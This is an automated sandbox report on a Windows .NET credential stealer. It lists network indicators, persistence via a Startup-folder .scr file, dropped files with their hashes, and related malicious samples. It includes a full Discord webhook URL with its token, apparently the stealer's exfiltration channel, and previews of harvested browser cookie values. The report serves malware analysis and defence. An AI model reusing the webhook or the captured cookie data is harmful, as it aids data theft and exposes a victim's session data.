                                                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://discord.comapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://discord.com/api/v10/users/4z5ru.scr.0.drfalse
                                                                                            high
                                                                                            https://drive.google.com/:apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://go.micropowershell.exe, 00000012.00000002.2408109229.000002CB34C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.micpowershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://drive.google.com/JapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://docs.google.com/presentation/?usp=installed_webappapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://ip-api.com/json/?fields=225545PapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://docs.google.com/document/?usp=installed_webappapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://oneget.orgpowershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            208.95.112.1
                                                                                                                            ip-api.comUnited States
                                                                                                                            53334TUT-ASUSfalse
                                                                                                                            162.159.138.232
                                                                                                                            discord.comUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1572913
                                                                                                                            Start date and time:2024-12-11 08:38:41 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 32s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:21
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:apDMcnqqWs.exe
                                                                                                                            (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                            Original Sample Name:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.adwa.spyw.evad.winEXE@27/22@2/2
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 20%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 62%
                                                                                                                            • Number of executed functions: 253
                                                                                                                            • Number of non-executed functions: 8
                                                                                                                            • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.181.67, 13.107.246.63, 52.149.20.212
                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6032 because it is empty
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6484 because it is empty
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7028 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            TimeTypeDescription
                                                                                                                            02:39:30API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                                                            02:39:33API Interceptor27x Sleep call for process: powershell.exe modified
                                                                                                                            02:39:44API Interceptor291x Sleep call for process: apDMcnqqWs.exe modified
                                                                                                                            02:39:45API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            208.95.112.1http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                            • ip-api.com/json/
                                                                                                                            ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                            • ip-api.com/json/
                                                                                                                            New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                            KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                            Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                            mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                            • ip-api.com/json/
                                                                                                                            interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                            • ip-api.com/json/?fields=8195
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                            run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                            • ip-api.com/json/?fields=8195
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            discord.comhttps://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.135.232
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            IErMYVWrv9.exeGet hashmaliciousPython Stealer, Luna Grabber, Luna LoggerBrowse
                                                                                                                            • 162.159.135.232
                                                                                                                            Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            ip-api.comhttp://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CLOUDFLARENETUShttps://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exeGet hashmaliciousHavocBrowse
                                                                                                                            • 172.67.0.58
                                                                                                                            Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                            • 172.67.70.233
                                                                                                                            SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                            • 172.67.179.207
                                                                                                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 172.67.158.81
                                                                                                                            https://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                            • 104.18.33.8
                                                                                                                            Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                            • 172.67.26.92
                                                                                                                            Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 172.71.119.218
                                                                                                                            EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                            • 172.67.179.207
                                                                                                                            EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.21.18.132
                                                                                                                            TUT-ASUSORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):190464
                                                                                                                            Entropy (8bit):5.995125051419421
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
                                                                                                                            MD5:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                            SHA1:2280AFE7BB2D07C315E2599C21F069DD1B7CE3B8
                                                                                                                            SHA-256:1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
                                                                                                                            SHA-512:0D690F46D18855009AF0B15A8E352DBE178DE4D0F055FAB00CC18837AD30AEE3FFFFEF5263BB6598FF0E6BA7DBB55029CE976101BE853CB03B01B9B440418C8B
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................O.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........@T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1965
                                                                                                                            Entropy (8bit):5.377802142292312
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                            MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):40960
                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):692885
                                                                                                                            Entropy (8bit):7.997438656394754
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:z6li8TUJM0pWV42FPi03ML0Ayftkl5p4aIrzSm+OVgyKUHnH2td/4fOQ+9:B8TaM5ZKLL0AyfA5itrzQLUEyfOX
                                                                                                                            MD5:80F4ED673EAFA69AFE70C10A66A237E6
                                                                                                                            SHA1:6EB1E30DA69F5089BD6F159A3AD6F8E3C1A04780
                                                                                                                            SHA-256:91A766C784F90B3D9B5FCA5BF86A8DCC3944EDC643D2D861CB1E2089BC7BD482
                                                                                                                            SHA-512:DB4C9B6F1CA6926869D5B1F6DF4A90FFA95F80E9565A91556D9725CE082C0D21EC741F8E2DAA19922F791A6D76AFB0A7816CEB675DF137BA9B3860E345BEBCCC
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........Y..Q.....!...#...Browsers/Cookies/Chrome Cookies.txt}..rC@....f&.Bw.].z .?.1...D.Q!S.}.......ij.\O#H....8.Al....j..PQ..b.........!W.]d..>w.?.lx.....].>N.9..:=]X]},.r..=...,.........]d=.c.%..&u:.k..Uy==...x...1.>R.[.X._....{....ez.^..q2.BRX.......bf.v#...*!..P..Q....M..........v..PK...........Y..............Display/Display.pngl.y8...6~..2d...3.P.J.1#...Q.K..$.....)....E.......}.}....|....8..9^s..~..u..y...OWG...<...,.M.{.@O.....hCe..m.9....t.-...R.G...C...N6...4v....'?P.m.c.8..QW.w6[>..>.w..Xs.v.....OC..t~.A.Jg.p....?.....4.7;...n%.....-p.K..68.<<...'..[.......v.n/f.y,.=.Z].s..O...kP....fj..S.....Kq.u..R.|........=$.s...]y.4..V..7..;<.8..E..m;.W<...n......85HB)........|4V.#..].O..K^?..*WMo7..pG.q]NO..}.:.UK....n....{......Zkl.#.,...u..Y..v.Ry<.D..v.:,#..e~.P...;T..=....e.>...Q..I...G.[...I..(U.RI...;..M..Y2..<...F....r_..n.....+..{LM.:L.i.!5.........[.QT._.=...."{.|.D.x..,#...a6.{.{.]^...C"v...I..o3..ups.3.v........~.X"..v.k...}&..".
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):289
                                                                                                                            Entropy (8bit):5.850578214989895
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Pk3r4QVLP36lSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISh+3rsB7iUuxbW:c74QVLP3ClDuyXv3RdJqmOvO65+7273N
                                                                                                                            MD5:12374B4FCB7DCDDB399BBC691B28FEDC
                                                                                                                            SHA1:2CCDFE6CAC3A0DF5A73E0009BF7C256030C9B77B
                                                                                                                            SHA-256:E952C4E4D88F7E4F25CC1CD22DFB854184B11C727EB19733E48819C7FB8D8990
                                                                                                                            SHA-512:4D0DA18548AD301EA9A165E78526269A1000E0CA856A08669A1520FCD5503AD7C608C477C892F550F28076263044055F30E52EB588855D38C934C16B617FF2AA
                                                                                                                            Malicious:false
                                                                                                                            Preview:.google.com.TRUE./.FALSE.13356771602392648.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.13343552440345167.1P_JAR.2023-10-05-06..
                                                                                                                            Process:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):709841
                                                                                                                            Entropy (8bit):7.926892930022921
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:kly9yLuLgP21SfDwiaPrxJ8zCJ8C6sdjGoKPntsj/cNH39nRclFl+q2i5G:klSsNw5PNJ8OJ8CPjG9yYN9RUl+R
                                                                                                                            MD5:C3262D897432D7D8B77117F3E043A194
                                                                                                                            SHA1:5DE269DDDB39C47697E11743DC8231D745476519
                                                                                                                            SHA-256:D81545C26BCE8BC9DA9EF2E530DDC678B3F165AF300401DC11E302B4635455F2
                                                                                                                            SHA-512:AAFA50DB9212B23EE961213012D77450FFEE9BF65EA8119E64F19B9E3285594EAB297A8091425ECF0A8FDF67218C04329411E168E3D37C76A2224F4EA5ED9F4E
                                                                                                                            Malicious:false
